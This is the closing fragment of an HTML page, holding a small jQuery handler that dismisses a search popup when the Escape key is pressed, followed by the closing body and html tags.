    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
